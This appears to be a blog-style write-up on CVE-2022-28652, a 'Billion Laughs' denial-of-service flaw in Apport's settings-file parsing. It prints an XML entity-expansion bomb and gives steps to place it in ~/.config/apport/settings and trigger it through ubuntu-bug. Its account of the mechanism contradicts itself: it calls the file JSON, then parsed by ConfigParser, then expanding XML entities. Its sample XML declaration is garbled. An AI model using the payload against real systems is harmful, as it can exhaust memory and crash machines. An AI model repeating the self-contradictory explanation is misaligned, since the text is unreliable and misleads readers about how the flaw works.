CVE-2022-28652 - Apport's ~/.config/apport/settings Parsing Vulnerability to "Billion Laughs" Attack

A newly discovered vulnerability, CVE-2022-28652, affects the parsing of the ~/.config/apport/settings file in Apport, the default crash reporting tool in many Linux distributions, including Ubuntu. This vulnerability makes Apport susceptible to the "Billion Laughs" attack, a form of XML bomb.

In this post, we'll take a deep dive into this vulnerability, including its detailed explanation, links to original references, code snippets, and steps to exploit it.

Background

Apport is a crash reporting tool in Linux distributions, responsible for generating informative reports about software crashes. It plays a crucial role in helping developers identify and fix issues in their software.

However, Apport's vulnerability, CVE-2022-28652, exposes it to a high-risk attack known as the "Billion Laughs" attack. This attack can cause the system to consume excessive resources, making it unresponsive and potentially crashing it.

The vulnerability exists in the parsing of the ~/.config/apport/settings file, in which insecure handling of XML entities can lead to a Denial of Service (DoS) attack.

The Billion Laughs Attack

The "Billion Laughs" attack, also known as the "XML Bomb" or "YAML Bomb," is a type of Denial of Service (DoS) attack that targets parsers for markup languages such as XML or YAML. It exploits nested entities that reference each other, causing the parser to recurse indefinitely and consume a massive amount of memory and CPU resources.

An example of the "Billion Laughs" attack using XML is shown in the code snippet below

<?xml version="1."?>
<!DOCTYPE payload [
 <!ENTITY laugh "LOL">
 <!ENTITY laugh1 "&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;">
 <!ENTITY laugh2 "&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;&laugh1;">
 ...
 <!ENTITY laugh9 "&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;">
]>
<payload>&laugh9;</payload>

In this example, the XML file defines a series of entities, each of which expands into a multiple of the previous entity. As the parser expands them, the total amount of data that needs to be processed grows exponentially, eventually consuming all available memory and CPU resources.

Exploiting the Vulnerability

As mentioned before, CVE-2022-28652, the Apport vulnerability, lies in the parsing of ~/.config/apport/settings. This text file is in JSON format, which doesn't offer support for entities.

However, Apport reads and writes this file using the ConfigParser library, which can be tricked into handling entities if the file is altered to use an XML-like format.

To exploit the vulnerability, an attacker would first need to modify the ~/.config/apport/settings file by editing it in a text editor and replacing its content with the following "XML bomb":

[DEFAULT]
<?xml version="1."?>
<!DOCTYPE payload [
 <!ENTITY laugh "LOL">
 <!ENTITY laugh1 "&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;&laugh;">
 ...
 <!ENTITY laugh9 "&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;&laugh8;">
]>
payload=&laugh9;

Once this alteration is complete, simply invoking Apport (e.g., by running ubuntu-bug) will trigger the exploit, causing the system to consume excessive resources and potentially crash.

Mitigations

To mitigate this vulnerability, it is crucial to deploy a patch that ensures secure entity handling. The patch can be applied to Apport's code, specifically where it reads and writes the ~/.config/apport/settings file. This patch should include updates to properly sanitize and process XML entities without causing recursion.

It is also advisable to disable Apport if you suspect that your system has been compromised or until you have applied the necessary security updates.

Conclusion

CVE-2022-28652 is a serious vulnerability in Apport that exposes a significant number of Linux systems to the "Billion Laughs" attack. It is essential for users and developers to understand the specifics of this vulnerability and implement appropriate mitigations.

Stay informed and up-to-date with the latest developments on this vulnerability by following official site releases and patch updates. Now is the time to act: ensure your systems are secure and safeguarded against potential exploitation.

References

- Official CVE Details
- Apport on Launchpad
- Billion Laughs Attack Explanation

Timeline

Published on: 06/04/2024 22:15:09 UTC
Last modified on: 06/11/2024 17:05:08 UTC